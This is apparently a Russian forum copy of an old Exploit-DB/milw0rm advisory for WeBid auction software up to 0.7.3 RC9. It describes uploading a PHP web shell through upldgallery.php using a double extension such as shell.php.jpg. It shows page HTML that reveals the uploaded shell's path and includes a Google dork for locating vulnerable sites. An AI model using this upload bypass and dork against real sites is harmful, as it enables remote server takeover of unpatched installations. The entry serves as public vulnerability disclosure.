- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8288
- Проверка EDB
-
- Пройдено
- Автор
- AHMAD PAY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-03-25
Код:
-----------------------------------------------------------------------------------------
Author : Ahmad Pay
Date : March, 25 2009
Location : Bojonegoro, Indonesia
Critical : High
Impact : System Access
Where : From Remote
---------------------------------------------------------------------------
Application : WeBid
version : <= 0.7.3 RC9
Vendor : http://sourceforge.net/projects/simpleauction
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~
Anyone can upload shell php with extension eg: shell.php.jpg.
Poc/Exploit:
~~~~~
http://www.example.com/[path]/upldgallery.php
Then after upload shell right click to the pages to find your shell path
#######################################
eg:
</script>
</head>
<body bgcolor="#FFFFFF">
<div class="container">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="float: left; margin-right: 10px;" id="thumbnail" alt="Create Thumbnail" />
<div style="float:left; position:relative; overflow:hidden; border:#000000 double; width:0; height:0;">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="position: relative;" alt="Thumbnail Preview" />
</div>
#######################################
Shell address above is : http://www.example.com/[path]/uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg
--------------------------------------------------------------------------
Dork:
~
Google : Powered by WeBid © 2008, 2009 Webid
# milw0rm.com [2009-03-25]
- Источник
- www.exploit-db.com